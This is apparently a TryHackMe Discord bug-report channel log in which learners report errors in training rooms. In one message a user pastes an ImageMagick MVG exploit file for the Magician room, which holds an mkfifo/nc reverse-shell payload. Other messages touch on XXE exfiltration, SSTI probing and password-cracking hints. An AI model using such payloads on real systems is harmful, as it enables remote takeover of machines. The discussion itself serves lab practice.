#room-bugs

I used tcpdump and ping to check for traffic, result ok. used ; and |, moved ". I'am lost here.

just solved it, for those looking for support on this --> sometimes it's just worth trying copy/paste rather than retyping all

Sorry, can't help you yet

Keep researching, you'll find something

embedded it, but nope.

wanted to report that tryhackme.com/room/zthlinux seems to be offline/private

https://cdn.discordapp.com/attachments/522158539129618453/813579764027490354/unknown.png

https://cdn.discordapp.com/attachments/522158539129618453/813579847439220766/unknown.png

@dusky junco

Muir I swear you can fix this yourself

I can. I just can't be bothered

lmao

zthlinux has been replaced by this block https://tryhackme.com/module/linux-fundamentals

I was just doing the WebOSINT room and the final exam question seems to be based on something that could not be found without the format given on the thm room page.

it indicates that the info can be found for the two domains but there is no indication that one of the domains ever was related to the answer.

The room "What the Shell" won't load in despise several attempts yesterday and also today.

Help needed!

Despite*

you're missing a part of it

which part?

The part at the beginning

What do you mean "won't load"?

@obsidian kiln The room just kept buffering with the circle animation for over 20 minutes.

Ah. That can happen if you have extensions blocking JavaScript. Try doing it in incognito mode?

Oh, and before you do that, the other fix I've seen is to join using the jr link

https://tryhackme.com/jr/intotoshells

@obsidian kiln Thanks! Will try it out once I am available. Appreciate the help 🤓

[https://tryhackme.com/room/shodan] Task 4 (First question): The top versions seem to have been changed so the answer is wrong. The right answer is ||5.7.32-35-log|| currently the answer is ||5.6.40-84.0-log||.

Question: What is the top operating system for MYSQL servers in Google's ASN?
||5.7.32-35-log - 19,444
5.6.40-84.0-log - 8,217||
||https://beta.shodan.io/search?query=asn%3A"AS15169"+product%3A"MySQL"||

@green steppe

not my problem

...didn't you ask us to ping you?

read the hints 🤷‍♂️

👀

I guess that room just takes to much time to update every time

no

not since the room was updated

the room can't have bugs, all flags are in the hints, if a user reports a bug it's their fault for not reading the first task which states that the answers update all the time and if something's wrong use the hints 😜

I just checked

that task has the flag in the hint

no bugs

Sorry about that

but there is no images

that's caused by my blog being down lol rip

npp thank you for reporting :)))

The jr link worked for the first time. After closing the room, this method no longer work, and the buffering persists.

Not sure if this is the right place to post this, please correct me if not. Regarding the Hacker One room, challenge 2, this happened when submitted the correct flag. Now it's marked as "already solved" and can't get the "back-to-thm" flag. Happened to anyone?

Same here. Task 3 Root Flag gave me NONE

ohhh noo 😢

@dusky junco Maybe you have the answer good Sir.

Don't hesitate to tag me on any updates, ty.

@dusky junco @green steppe There is a same error faced by many users in the Hacker101 platform for gaining flags for root and sending them to the THM platform for the easy challenge. Please see to it that it is resolved as more and more members have joined the room and they are facing the same issue as it is mentioned in the #announcements

It’s H1 side of issues they can’t fix that unless all the flags get changed to THM format

Ok

So. Are we just not going to be able to submit flags then?!

https://tryhackme.com/room/johntheripper0, task 6 and not really a bug but poor/misleading writing imo (or maybe the way john works in that regard changed, idk. Should still be addressed, though):
The whole task is about shadowed password files and unshadowing them to feed that file into John, when in fact you don't have to unshadow anything at all!? The task explains that when you don't have the whole passwd and shadow files, you can just put the relevant lines you have in a file each. So of course what I'm going to do is extract the two lines from the Task-File and put them into separate ones to unshadow them. When you do that and feed the resulting file into john, it just says that no password hashes have been loaded and points you toward the FAQ. I've spent about 40 mins to try and figure out myself how to get it working before consulting a writeup. The author of that just fed the Task-File (as is! No unshadowing) to john and got it cracked?? I then tried the same and it worked as well.
So to get to my point: Why is the whole task about unshadowing passwd files, leading one to believe, that the Task-File (or at least the lines in there) is supposed to be unshadowed as well, when in fact it isn't required nor even works if tried?! Pls fix!

@obsidian kiln fixitfixitfixit

room: https://tryhackme.com/room/furthernmap task 9, i think these additions could be made

I shall upgrade that now 👍

yes :(

-undelete -a

https://tryhackme.com/room/cryptographyfordummies
Task 5 - i suggest - I not i

Room: Empire, Task 8

Image Link is not correct.
https://assets.tryhackme.com/additional/attack0.png
⬇️ ⬇️
https://assets.tryhackme.com/additional/mitre/attack0.png

#room-help

The image upload in magician doesn't work in firefox, but it works in chromium

Small typo in the "Cyber Scotland 2021" room

Should be http - https is not enabled

@obsidian kiln

Room: https://tryhackme.com/room/easyctf Task:1 Question:2

I found 2222 ports open but not accepting my answer? #room-bugs

Closed. Not a bug.

In the Cryptography for Dummies room (https://tryhackme.com/room/cryptographyfordummies) it is mentioned in the text that asymmetric cryptography is more secure but the corresponding question What type of cryptography is more secure? in Task 2 accepts symmetric as the correct answer.

In the cryptography for dummies room, it says "The most popular use of hashes is for file identification and storing sensitive data, like passwords." First part is wrong, it isn't used to identify , it is used to verify the integrity of a file to make sure it has not been changed, identifying has nothing to do with it. Like in the CIA triad, hashes are under I-Integrity

It is also used to identify files, like removing duplicates or detecting child abuse material.

That's an unfortunate case of fault tolerance on the answer. Once you've refreshed the page, it will show the correct answer value.

(kinda) Typo in the Scotland room, at the end it checks for:

Hacked By but it should check for Hacked by, I know its only small but yeah @obsidian kiln

Take it as a lesson in being exact and following instructions

What I meant was that I typed in symmetric and it was accepted as the correct answer

Yeah, that is due to fault tolerance on the site for answers that it accepted it. It's unfortunate in this case, as the wrong answer and right answer are only one letter off.

Hi all, any updates on this issue?

Hello, I'm working on the Wireshark 101 Room. On Task 7 (ARP Traffic) when downloading the provided task file it seems to be incorrect to the actual questions of the task. The pcap file is different to the one provided at the Wireshark's website. After downloading the file from the Wireshark's provided link it all seems to match.

Send me a DM.

Just wanted to post up that the Introduction to Django room does not work (specifically task 4). I tried the room 5 separate times from scratch. Other members are having the exact same issues. Another member showed me a tutorial on another site that works perfectly. The room is broken. I reached out to the creator of the room but got no response.

@next bluff

Steel Mountain room task 3 in particular, but it's a bit of a thing throughout the entire room, lot of screenshots, lot of no alt text for the screenshots. I don't even necessarily expect command output to be featured if we're screenshotting but can I please at least have the commands used in alt text or caption? I don't mind researching but as a screenreader user, having a flow explained in pictures where I essentially have to play guess the verb to recreate what was shown seriously slows me down and takes me out of the flow of learning a new technique. Thanks very much 🙂

AoC2 or 25 Days of Cyber Security, and any other references to https://scylla.sh/ need to be switched to https://scylla.so/ (https://twitter.com/_hyp3ri0n/status/1352330378774781954?s=20) not that it's currently up

Room: Cryptography For Dummies
Task: 2
Question: 2 {What type of cryptography is faster?}
Bug: The Answer should be "Symmetric" but the Question accepts "Asymmetric" as Correct

answer tolerance probably

that's unfortunate

Room: Magician
Uploaded the exploit.png... Available in list images... But no reverse shell... Contents of exploit.png...

encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|mkfifo /tmp/gjdpez; nc [PRIVATE PART] 1234 0</tmp/gjdpez | /bin/sh >/tmp/gjdpez 2>&1; rm /tmp/gjdpez '
pop graphic-context
pop graphic-context

you sure there's nc?

I had to try several payloads before one worked

See 10 posts earlier, it is due to answer fault tolerance.

Not a bug. Keep trying. 🙂

wget doesn't work... tho another file successfully uploaded 😅

what was your payload?

My payload

check your ports

oh wait

I replaced the mkfifo command with my wget one... hopefully that was the right choice?

small mode is misleading

Well I can zoom in if you want

naw it';s fine

I used the fill method

On it

didn't try image over

but it should be fine...

Also, the color red is about the worse reading color for your eyes and eye-strain. Save the eyes! 🥳

Yeaa, I will change the color shortly after... Just been busy due to exams 😅

so here I tried appending the double quotes as were in the payload before ls "ls like this... still no luck in shell.php

The wget payload

Is this actually a bug or user error?

I am pretty sure, I might be doing something silly with the box... I mean others solved it in few hours after release... But I am not able to figure that out yet 😓

I think me only... how's your status on the box?

I don't do boxes

Ohh right... I will continue on the #room-help channel

who's in charge of the HackerOnTheHill medium box?

IIRC seth made it

One of the commissioned creators

ok I just want to know if this is intentional or not

and it's spoilery

but basically the ||achilles|| user has ||full admin rights to the machine....||

In the Metasploit room https://tryhackme.com/room/rpmetasploit at the end it's suggested to try out run autoroute -h, however, in current versions it says it's deprecated and you should use the module post/multi/manage/autoroute instead

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.

and in msf 6.0.29-dev there is no ||auxiliary/server/socks5|| anymore, which is an answer in the room 😉

Room: Sysmon, Task 6 Detecting Mimikatz

The filename of Windows Event(evtx) is incorrect.

• Hunting_LSASS.evtx ➡️ Hunting_Mimikatz.evtx

hello. any staff member here?

Why do you need staff?

#site-support message

I want to understand why i am getting AV alerts from the wepbage before disabling my AV protection

and I cannot advance my room or increase VM lifespan

Are you using AVG or Avast?

Bitdefender

Ah, ok yea you'll want to disable it, for some weird reason some AV like to block it

this isn't the best solution for a security-oriented professional and community
i have no doubts the community and website are legit, but i think these should be solved and understood where we can

@zealous helm it's the nature of hacking, I'm afraid. Antivirus is designed to keep you safe by insulating you from anything dangerous. By definition, learning to hack is dangerous -- antivirus can't tell the difference between you learning, and an attacker executing malicious commands.

You can add exclusion on the TryHackMe website. That's what I've personally done

So, essentially, it's something you're going to have to live with. You can't play it safe and learn dangerous stuff at once.
Most of the tools you'll be using would also be picked up by AV -- it doesn't make them harmful, just that they could be used in a harmful way

To endorse what muri says. Bitdefender picks up a lot of the windows stuff

It will block you downloading stuff from GitHub as well

AVG wasn't that silly but it seems that bitdefender takes a step forward

I added my vm folder into the exclusions list and TryHackMe me as a safe website and it works fine

Local malicious files and stuff I control / want to analyze - that is understandably blocked by AV and it should be, by all means. I can manage excepting that stuff.
But the alerts I am receiving are on a request made when I want to access the Alfred room web link, with the list of tasks. - which should not serve anything malicious

And yes, AV blocks downloading of mimikatz, for example, or Google warns against pentestmonkey website. but those are known to be malicious stuff (not pentestmonkey, I never understood why google warns against that in particular, since the code is just there, not actually executing)

too add to the issue, the alert comes only for the alfred room and I can provide the link, should anybody want to look into it a bit more
other rooms are ok

please describe the smell of roses then

I don't get the reference, if it was directed at me

I am aware that FPs exist but also want to make sure there is nothing wrong with that particular page

Bitdefender has a LOT of false positives with THM

Simply submitting '/etc/password' as an answer from a Windows machine triggers an alert and blocking.

Windows defender keeps picking up my PHP reverse shell it's a bit annoying

Detects it as an RCE attempt which K think we can all agree is total nonsense

I means it's not wrong per se

I'm still talking about /etc/passwd

Oh yeah that's dumb

Some AVs are overly zealous

There a Symantec thing that blocks all TCP and UDP communications to WSL2 on my work machine

To and from rather

https://tryhackme.com/room/wireshark, task 5

This second method is known as display captures, you can apply display captures in two ways: through the analyze tab and at the filter bar at the top of the packet capture.
it's "display filters" rather than "display captures"

also, in task 6

Application Protocol (Layer 5) -- This will show details specific to the protocol being used such HTTP, FTP, SMB, etc. From the Application layer of the OSI model.

Application Data -- This is an extension of layer 5 that can show the application-specific data.
application is layer 7, not 5

in task 11,

HTTP is one of the most straight forward protocols for packet analysis, the protocol is straight to the point and does not include any handshakes or prerequisites before communication.
this is wrong, it's tcp so it still requires the three way handshake prior to http requests

in HOTH:hard, is it normal that the application running on container 4 is totally and completely broken?

No it isn't normal -- it might take a minute or two to startup in comparison to the other containers but

at least the POST and the PUT can't possibly work

should be fully accessible

sending a put breaks the app irrevocably requiring a full reboot of the VM

running it locally to get a debugger on it and I'm getting strange things

I believe I took the pathing to needing to POSTing & PUTing out in the end (before the event started)

Oof

Well that's not good at all

I'll have a deploy & look at the code

after a PUT:

then internal server errors regardless of what happens

||the whole "launch applications" is a rabbit hole there's just an endpoint that discloses information ||

and for a POST:
||

    app_id = int(max(APPS.keys()).lstrip('name')) + 1
ValueError: invalid literal for int() with base 10: 'pp4'

||

I know that it doesn't do anything, I was looking for SSTI

because I can't find any other way to privesc to root to exploit the rest on that container 😦

ahh gotcha

(yet)

there's 3 ways to privesc (as per the room) and 4 containers so ((:

well, darn I haven't found a foothold on any of the other machines yet

one might consider it a "bonus" container once you get a foothold

everything is filtered to hell and back

Do you have an instance up rn?

yeah

I'll look around some more if that container's a bust

It's not a bust in the sense that there's nothing of value

DM me the IP ((:

too bad there was a lovely bit of footwear lying around

hang on

seems to be a blocade on my or your end

the only situation I can think where everything is filtered is if yeah the containers have died (or you started hammering the IP straight away)

not nmap filtered

I mean it's being cheeky

ah gotcha!

I guarantee you -- you're looking farr too into it (:

but if you think there's an issue with the box gimmie a DM w/ it and I'll double check!

like there's a potential LFI which keeps telling me I'm not allowed to view files in said directory

so yeah trying harder 😛

that one's the most promising lead I have anyways

potentially aye -- but you know the endpoints by now, something returns a value. It's just about using the info it returns & the enumeration you would of done at the start (:

Trying my best to not spoil it

yeah I know it's hard 🙂

not sure what to do about the login, and I really don't want to resort to bruteforcing

the other one I have a lead but no avenue to exploit it yet

The most I can say about that one is just have a look at how the form works and go around that ((:

there's an api somewhere, ight have to fuzz that one of these days

and a token

you don't need to fuzz to see where requests end up

Okay I gotta bite my tongue on after that lmao!

I've got every element already written up -- just waiting for competition to end

yeah ok there's something wierd about that server

I'm taking a look at the container you were talking about but yeah you're farrrr overlooking it

but PUT'ing and POSTing shouldn't make everything fall over soo I need to recreeate that condition

I got in that container

but didn't find anything too useful inside

there's 3 ways to privesc (as per the room) and 4 containers so ((:

it depends on what you consider too be useful

yeah nothing that lets me abuse aforementioned footwear

😅 I can't help too much outside of what I've talked about and looking at the code for that to see why POSTing etc crashes it (which I'm doing rn)

POST just does nothing

the app_id thing breaks

-  app_id = int(max(APPS.keys()).lstrip('name')) + 1
+  app_id = int(max(APPS.keys()).lstrip('app')) + 1

this seems to work

-mute @wheat fractal 1h Spamming invites.

🔇 Muted VEYZOX#1337 for 1 hour

near line 67

- APPS[app_id] = app
- return app, 201
+ APPS[app_id] = name
+ return APPS[app_id], 201

line 55

tbf put should probably return 200 OK

in any case there doesn't seem to be an SSTI locally

❯ http -v "http://localhost:8080/apps"
GET /apps HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Host: localhost:8080
User-Agent: HTTPie/2.3.0



HTTP/1.0 200 OK
Content-Length: 123
Content-Type: application/json
Date: Sat, 27 Feb 2021 22:13:52 GMT
Server: Werkzeug/0.16.0 Python/3.9.1+

{
    "app1": {
        "name": "{{7*7}}"
    },
    "app2": {
        "name": "media player"
    },
    "app3": {
        "name": "file sync"
    },
    "app4": {
        "name": "/users"
    }
}

https://tryhackme.com/room/introtoshells, task 4

The example in the previous task used port 4444
the previous task used 443 and 8080

@obsidian kiln that one's yours

Good catch -- fixed

not sure where to post this, I was doing the Active Directory Basics room and the deployed VM uses powerview.ps1 version 2, and the link provided for powerview commands is for version 3, which have different commands. The correct commands to complete the room are not in the linked cheat sheet, so the link should be changed. (Task 8)

i had complete Lunizz room... but ,i believe there is a bug in the room..

Room: Yara, Task 9 Using LOKI and its Yara rule set
https://tryhackme.com/room/yara

prepared YARA rules in the THM VM has an Error.
/home/cmnatic/tools/Loki/signature-base/yara/gen_icon_anomalies.yar

In this rule, Yara needs "pe" module. But import "re" is not written, so it occurs syntax error when following the Task 9 Document.
You need to add import "re" to gen_icon_anomalies.yar.

did you say to me?

You may wish to say what the bug is

yup

Hint : For those still working on Lunizz, YES, you can get ad****'s password from the bcrypt script and the popular wordlist. Here is what i did, i removed all special characters that did not convert to ISCII , all numbers only passwords (because who does that?), all 6 characters or less (as a start , because of the first mysql password length, thought others will be long as well). This still took a long time but not as others.

Another Lunizz hint on that password: Its a plaintxt for a known sha256 hash, so maybe skip all the other words in the wordlist and run against known shar256 hashes. My writeup is coming soon

This is the bugs channel

Yeah, people were saying the room is buggy. I think its fine

reposting as they got buried, @twin tapir this is your room xx
#room-bugs message
#room-bugs message
#room-bugs message

Hey, is there an issue with the server on port 80 on the hard HOTH box?

basically I have file read, but one of the files that should be there, isn't

or at least it's not showing up

same, || got xxe, got exfiltration, but /var/www/html/controllers/Api.php|| doesn't exfil....

At cyberweek2021, I think we miss how to add IP <host> to the /etc/hosts.
It's a really nice Entry Room, but I think that point is useful.

What's this?

I'm doing the Kenobi room and if you scan all ports not just the top 1000 the answer you get to the first question is wrong :/ I've got the right answer I just don't like it

nmap -sV -p- -A -vv -T5 10.10.202.126
that returns 11 results, whereas the hinted command is
nmap -vvv 10.10.202.126 which returns the number that is wanted in the question. (7)

thanks.. excellent @obsidian kiln Nice ROOM!!!

Read the questions properly , It says open ports , not all ports you find after a nmap scan is open .

Szymon?

So for the Reloaded room, there appear to be multiple ways to get the flag for Task 3: Level 2. I modified a jne to a jmp in order to bypass the check, but apparently this is not the intended path as the next question doesn't take this answer

||Also all the binaries do direct strcmps leaving the flags in the clear...||

This task to be precise:

Hey, anyone doing hacker of the hill?

is that you @acoustic fjord

ask cry, he placed me there for memes

doxy mc doxydox

Hi everyone, was doing the Linux: Local Enumeration room and in one of my answers instead of "correct" or "incorrect answer" I got "undefined". Is this a bug or?

replying to myself here. This is not a bug. I think this is down to the implementation of whatever http.server you use to host your dtd/listen to the calls made in order to exfil
I was using python3 -m http.server and hitting a URL character limit. Others have told me they used netcat successfully (I didn't test this). In the end chaining filters allowed me to compress the results enough to fit it in my http.server.

I'm gonna guess you're running bitdefender?

This is ugh intentional? But now that someone has reported it does that mean I have to change it? @obsidian kiln do I have to change it?

Yes

Bad Cry

Don't abuse poor Szy

but

funny meme

but what if I want Szymon to monitor my endpoints and environments?

I hear some might even hire Szymon for such a valuable task

In room https://tryhackme.com/room/bashscripting, is just the link when it should be the image

Nice, I found the easter egg! Not a bug!

resolved + a few minor things thanks ((:

could these get fixed in the wireshark room? 👀
#room-bugs message

my boyyy @twin tapir you're up x

Ok apparently the expected answer is an alias...

https://tryhackme.com/room/tartaraus - Is tartaraus meant to be private?

https://tryhackme.com/room/zthlinux - Linux Learning room is also private for some reason

The creator was site banned

It was broken out into the Linux Fundamentals rooms.

Oof (And their rooms got nuked as well?) - And - Aaah

The room wasn't deleted

It was made private by dark

In that case it got removed from public view because of the circumstances around the ban. Usually the community and site are separate

Aaah - I see.

All good then 🙂 Might just need to remove refrences to it from other rooms then

They were site banned as well, by Dark.

I know -- for the same reason

what would happen to their rooms now? will they be private or deleted?

ignore if you don't want to ans 🙂

Their one room that they created was made private.

👍

I'm going assume that you have to be really really dumb to get site-banned.

seems like a fault that the new room is called JPGchat but the actual chat service it uses/refers to is call JPchat (without G).

I'll assume typo

Room: Splunk, Task 2, the last Question
https://tryhackme.com/room/bpsplunk

what is the website where you can find the Splunk forums at?

||answers||.splunk.com no longer exists. Now it's integrated into ||community||.splunk.com.

Hey, @next bluff, I have a (hopefully not too long) message drafted regarding a private room you developed. I might have found an issue, but I’m not sure (may be intentional), and since it’s private I’m thinking I probably shouldn’t paste it here 😅 What would be the best way for me to reach you?

Edit: also, if this isn’t appropriate for this channel, let me know!

You can DM me here on discord

Hey guys, does anyone has an idea why in the room 'upload vulnerabilities' the site 'jewel' for example doesn't load anymore when I use FoxyProxy? Couple of days ago I had no problems to open the site and other sites load as usual... Any ideas? Would appreciate it.

is it still set to proxy to Burp without Burp open?

because that happens to me all the time

no burp is open, other sites load normal only the sites from the room don't load

hello i've root Alfred

but i don't find the root.txt

it is supposed to be in the folder C:\Windows\system32\config

but he seems to be deleted someone can help me

Not a bug, look at the steps in the room, it tells you that you need to migrate.

have an issue with PoloMints Johntheripper room, the secure.rar file wont finish (stalls at 279b) downloading, tried refreshing the page.

-Task 10

downloaded here fine

Bugger, must be my end. Thanks for checking

you connected to the vpn? could be affecting it

Aoc2 day 29: unable to upload file .
Filter says file accept:png, jpg, jpeg.
Even though i tried uploading above file formats it says file format invalid.

There is a small mistake in the ccpentest questions

i answered it wrong but shows correct

i think it is supposed to be : use exploit/..../...../..... : instead of "set"

I think its because of THM's answer policy, they are very linent on answers

Reload the page and see if it stays like that

in the bufferoverflowprep room the patch for the metasploit tools pattern generator is said to be /usr/share/metasploit-framework/tools/exploit/pattern_create.rb but in Kali this is now /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb

I think there’s something wrong with the machine in the Nmap room. Will only respond to the same command very occasionally

Probably your VPN.

it's not really a bug but in room https://tryhackme.com/room/agentsudoctf in Task 5 (CVE number for the escalation), ||https://packetstormsecurity.com/files/154857/sudo-1.8.28-Security-Bypass.html || can be used too but it doesen't have a CVE number.

Hello not sure if it is a bug or me but in the overpass2 room , in the last question ,the suid script when run leaves me with uid=1000

Then you're doing something not quite right

Not a bug

hmm ok

In the room "Searchlight - IMINT"

there is an error in the amount of * for the correct answer

The answer start with Alan those will be 4 *, no 5 *.

Is it possible that the Intro to IoT Pentesting room has something wrong? At the end of task 5 you're supposed to be able to curl for the passwd file. However, not surprisingly I think, I get a 404 error on curl and get commands. Tried /etc/passwd, etc/passwd, /passwd and passwd. Same results, 404.

@eternal summit ok I did it. I had to logout and ssh back in again to make it work. Thx

https://tryhackme.com/room/rpmetasploit, task 7:
I believe the wanted module (socks5) no longer exists, at least for me it doesn't show up in metasploit search and if I try to use it directly, I get an error message.

in the new Solarwinds room, I believe there is a bug in the SHA question. I tested all the SHA-1 values listed in the indicators and none of them work.

hashes are listed here: https://github.com/fireeye/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_Hashes.csv

that one took me a bit, but if you read through the article it's there just not labeled by hash type

strange that it does not match any of the SHA-1s listed for detection

I did try that one but right now it seems like THM is really slow from here.

it doesen't explicitly say it's the sha, just read the whole article and search the sha pattern

i can assure you it's there

I found it yes, but it is strange that it does not match the SHA from the detection files

Not so much a bug, but a gripe with that same room.

Can you find the IoCs for host-based and network-based detection of the C2? The flag is the name of the classification which the first 3 network IP address blocks belong to? is so unclear as a question.

Understanding what a challenge is asking me to do should not form part of the challenge.

just focus on this part classification which the first 3 network IP address blocks belong to

Probably shouldn't be handing out hints around this.

ok found it. it is not an SHA but an MD5

true true

just reading and understanding that question makes it crazy

Yeah

And I know the answer, but it doesn't fit into that flag format.

It's just so god awfully unclear.

the answer is pretty stupid but a name that especially Cisco training material tend to use.

LOL

got it done

thank you

just to extend my issue here: the question asks for an SHA but the answer is actually the MD5 for the file

Man I'm fuming

classification?

That's not a classification

That's a frickin

well, no spoilers

But IP block classifications are (in old standards...) A B C D or E

exactly

An *** is a design document

not a classification

And E

Fixed for your factual pleasure 🙂

i'm baffled lol

stuck here

its literally not at all relevant

The first half the the question is irrelevant and leads you down a rabbit hole

And the second half is also... wrong, or misleading at best

yeah it's an odd question

I mean I know the answer but not in the form the room wants it

or maybe not

depends on what u know

as man hray said ignore ioc, and partially ignore class

I'm not certain which IPs it's referring to tbf

first 3 ips of the ip block in the article

the local ones?

ok that's what I thought it was

yea

This contradicts the advisory

It's just later in the list?

Chances are that's been updated since the room was released

probably

@dusky junco this one's for you -- I fixed the last one 😆

just below

yeah ok the question is dumb and realllly needs to be rephrased

noone refers to that as that

Is there a reason why sometimes THM rooms aren't updated to the environment?

Wut

😀

thanks for the hint

pls gief 20 mins of my life back

I would not have found that otherwise

I didn’t give a hint, hints are illegal

thanks for the vent then

I just made a bug suggestion 😛

Can you clarify?

I don’t want to go into too much specific so it doesn’t ruin the room.

E.g. the room will ask you to use one method however the method is not available on attackbox and you need to use another method

I’m happy to message you privately regarding the specifics Ninja

You can say it here.

Ok , so on the room wireshark

It will ask you to use the TLS protocol to decrypt the https traffic with the KEY however on attack the box, I believe the wireshark is not updated as the TLS protocol isn’t there.

After a bit of researching I found that we can also use the SSL protocol instead.

And have you checked version numbers to verify this?

I cannot verify the version number as I’m not on it at the moment. I read an article that said if you cannot find the TLS protocol use the SSL protocol instead and it worked.

So the room works just fine. Requiring a little bit of research and troubleshooting isn't much of a problem.

Ok sweet, just wanted to know if the rooms were built like that on purpose.

No, but things change. People's installs are different.

Do rooms get updated?

yes

If the creator chooses to.

Ok sweet, thanks for answering @eternal summit

Wireshark makes me cringe

If you need to report a bug on Wireshark please check the previous bug reports first

I’m very busy and I’m aware of the issues I have a large load of rooms to maintain along with my other workload

may not be nothing, but i was "cleaning" some rooms, and i think this error can lead beginners to a bit of confusion, isn't it ARP-Poisoning?

Is this a typographical error? Saying Application protocol as layer 5. it could be a confusion for beginners if so.

Please state the room when you're reporting issues with rooms, otherwise it's pretty damn hard to get them fixed as we don't know where the error is.

Wireshark 101 - Task 6 Packet Dissection

hey any mod is on ?

@eternal summit hey man when i open anything on a new tab the tab just crash

That's not what discord mods are for.

Discord mods are for moderating the discord.

if its refering to TCP/IP, thats accurate, if OSI, yeah it needs to be updated.

@twin tapir reee

actually some of the people at Cisco do (for some very very strange reason). If you check their training material they use that exact name to refer to this group of IP addresses

Also, that grammar....

The... what, at Cisco?

the not so smart people making training material 😛

Soooooo, we're using mental illness as an insult?

I this end of the world that word is an insult (and only used for that). We have other words for the illness. But hey look I changed it.

xD

In the "25 Days of Cyber Security" on task 16 "OSINT - Where's Rudlph"
A third party site http://scylla.sh/ is needed. But it isnt accessible anymore.
Is the second last task still solvable?

https://tryhackme.com/room/introtonetworking, task 7

Your phone is connected to it, as is your computer. What happens if you want to send something to your phone from your computer? You can't just send stuff directly to your phone -- not without directly connecting them, so how would the information get across? The request would first be sent to your router which acts as a gateway
this is kinda correct for home networks, since the "router" has an inbuilt switch. but since both devices are on the same network, the request would not go through the switch

Room LinuxPrivEscArena - Task 6 : unshadow command not found.

also in task 9

There are precisely 13 root name DNS servers in the world
there are 13 types of root servers, but there are 600+ iirc

you need to run that on your machine, not on the target machine

Oops, see it now. My bad. Excuse me.

@obsidian kiln ^^

What am I getting pinged for?

the introtonetworking room is yours i believe

Oh, I've already updated that one

oh damn you fast

soz for the ping then xx

Np!

Dumping Router Firmware - Task 2 -Q 7 to 9 -What was the creation date? Can't make anything else of it. Yet, the answer is wrong? What is the CRC of the image? Clearly visible, yet answer returns wrong. What is the image size? Also clearly stated, yet wrong? Is this a bug? Should I report it? Is Sq00ky around?

Dumping Router Firmware - Task 3 -Q 6 -What is the build date? Clearly stated, yet wrong?

Same for task 3 Q 11.......

no

nk

molonml;

mknkln
nknk

make me admin or else I will hack everthing

@sonic rover

Oh

Wow.

@carmine echo Can you explain that comment please? Very quickly.

(This is me giving you a chance, because I'm kind)

hi, there's a link thats broken : https://tryhackme.com/room/zthlinux

Where?

that room got replaced no?

by https://tryhackme.com/module/linux-fundamentals

Ah! Everybody is awake again. Anybody have any info on the room Dumping Router Firmware bugs?

Task 7 2nd question seems to have it wrong, server/socks5 doesnt exist in metasploit search https://tryhackme.com/room/rpmetasploit

Yeah. But they haven't said where they found the link.

Where is that link?

Seems to be gone in msf6

try auxiliary/server/socks_proxy

answer is wrong still, i just followed whats on the video

auxiliary/server/socks_proxy is the same as previous socks5 and socks4a just need to set it in options

so uhh on machine with the IP 10.10.44.239, I'm supposed to have access to port 21, and exploit it using ftp-anon but for some reason it doesn't allow me. It keeps saying the port is filtered when it's not supposed to be

in room Nmap, on the "practical" task category

last question

Not a bug

Well, it's a THM platform bug because the VM died.

Hello, here a correcting that could be made in the Room Network Services under Enumerating SMB

The wording should be What ports are SMB running on? instead of is smb running on?

It makes a confusion beliving the answer is portnumber/TCP instead of 2 port numbers. Thanks

Anybody have any info on the room Dumping Router Firmware bugs? I posted about this earlier today.

forgot, ill look for it when im done with the current room

i think it should actually be "What port is SMB running on?"

It's asking for the pair, because smb here is NetBIOS+SMB

WTF!! Hhahahaha.
0 flag, 60 points earned.

It's a caching bug

the points have been reset

Stealth points for me. 😄 Full disclosure: those points were accrued during room testing, and don't count towards totals.

^ He speaks the truth...... or does he 👀

@tough linden Hey, sorry for the ping.
With your Windows PrivEsc room, on Task 11, the python-crypto package has been removed from kali so we cannot apt install it. https://pkg.kali.org/pkg/python-crypto
Most of the tools for extracting the hashes from the SAM and SYSTEM hives seem to be python2, which is the root of the problem.
I think it'd be great if the room could be updated so that people don't run into this problem, and potentially include alternative methods of dumping the hashes given the registry files. I think the most stable one is going to be samdump2 which is a part of Ophcrack.

Additionally, I think recommending --force there is somewhat irresponsible as it can lead to both false positives and false negatives

Hashcat in a Kali VM was largely fixed, but it's better to recommend John for VMs.

Impacket Secretsdump is the one I would go for

Will that dump from SAM+SYSTEM registry files?

Also I thought we were avoiding easily broken tools

Yes, it will

And, uh, shaky as impacket may or may not be, that one has never failed me

samdump2 is in c, so no nasty python dependencies. Binary for Kali as part of ophcrack.

The room does need an update, it's on my Todo list. I recently released a working Python 3 fork of creddump7 though: https://github.com/Tib3rius/creddump7

Well that's awesome

Yeah it was a pretty easy fix (like one line change) so worth it I think 😊

hello guys

Two things. Firstly, this is the room bugs channel for reporting bugs

Secondly, that room is under a hints embargo here for a while under Rule 13.

ok sorry i will send the messege in room hints

Please don't

Please wait a few days so that people who want to do it blind can do so without spoilers 🙂

got it thank u

I’ve been having that issue. Scans don’t work sometimes even after rebooting the room machine and the VM im attacking from

yeah really weird lol

Hello, on room https://tryhackme.com/room/wireshark task 12, it mentioned to add the rsa key at Edit > Preferences > Protocols > SSL > [+], but in current versions of wireshark, 3.4.3 , the section is located at Edit > Preferences > Protocols > TLS > [+].

the Lian_Yu video doesn't work because the channel was terminated

@quartz granite can you dm when your on, think I found unintended root

Ok, I need to know if it’s TLS or if it’s SSL I’ve been given conflicting responses for a while

Well, you can always quote "SSL or TLS depending on the wireshark version" , in my case was wireshark 3.4.3 on Kali

guys i have one question, i am doing the /introtonetworking room, on task 9 the whois part. question nr 5 goes like "wich city is the registrant based in" and the answer is not shown on the results, i had to google the answer which kind of ruins the idea of the whois.

You are looking at the wrong domain

Part way though, the domain you need to be looking at changes.

ok thanks

In the room Ghidra, it says you can use this: sudo apt install openjdk-13-jre openjdk-13-jdk to install the package, but when using that command, it gave an error. Unable to locate package

https://executeatwill.com/2019/04/04/Install-Ghidra-on-Kali-Linux/

Ty so much👍

It works

🙂

There is a RSA keys section in there. I think i used that instead and it worked for me.

Im also in windows, using the second to latest update. My wireshark just asked me to update recently

I don't know whether it is a bug, yet the history of the linux fundamentals 1 reveals a lot...

https://tryhackme.com/room/zthobscurewebvulns, task 16

The interesting this is we still need is a second . to denote that a signature would be there, even though we don't put anything after it.
i think this is trying to say
The interesting thing is, we still need a second . to denote that a signature would be there, even though we don't put anything after it.

The Teams room had bug where the sshkey wasnt working

Depends how you copy it. 😄

yeaah after i figured it out it was kinda stupid

It's intended and not a bug. 🥳

